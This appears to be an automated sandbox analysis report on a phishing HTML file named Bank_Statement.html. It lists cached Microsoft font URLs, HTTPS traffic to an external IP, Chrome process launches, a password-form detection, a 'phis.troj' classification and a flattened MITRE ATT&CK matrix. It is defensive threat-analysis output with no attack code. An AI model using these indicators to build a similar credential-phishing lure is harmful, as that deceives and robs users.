          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-hebrew/segoeui-regular.woff2
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-hebrew/segoeui-semibold.woff
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-hebrew/segoeui-semibold.woff2
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-hebrew/segoeui-semilight.woff
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-vietnamese/segoeui-bold.woff
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-vietnamese/segoeui-bold.woff2
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-vietnamese/segoeui-light.woff
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-vietnamese/segoeui-regular.wo
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-vietnamese/segoeui-semibold.w
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-vietnamese/segoeui-semilight.
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-bold.wof
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-regular.
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semibold
          Source: chromecache_83.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semiligh
          Source: chromecache_97.2.drString found in binary or memory: https://storage.live.com/mydata/myprofile/expressionprofile/profilephoto:UserTileStatic
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 159.89.102.253:443 -> 192.168.2.6:49739 version: TLS 1.2

          System Summary

          barindex
          HTML document with suspicious name
          Source: Name includes: Bank_Statement.htmlInitial sample: statement
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6372_41766783Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6372_41766783Jump to behavior
          Source: classification engineClassification label: mal88.phis.troj.winHTML@24/53@20/8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1948,i,13033855632054876856,16011394512874276020,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1976 /prefetch:3
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Bank_Statement.html"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1948,i,13033855632054876856,16011394512874276020,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1976 /prefetch:3Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected

          Stealing of Sensitive Information

          barindex
          HTML file submission containing password form
          Source: file:///C:/Users/user/Desktop/Bank_Statement.htmlHTTP Parser: file:///C:/Users/user/Desktop/Bank_Statement.html

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          Browser Extensions          		1
          Process Injection          		1
          Masquerading          		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Web Service          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Process Injection          		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          File Deletion          		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
          Ingress Tool Transfer          		Scheduled TransferData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.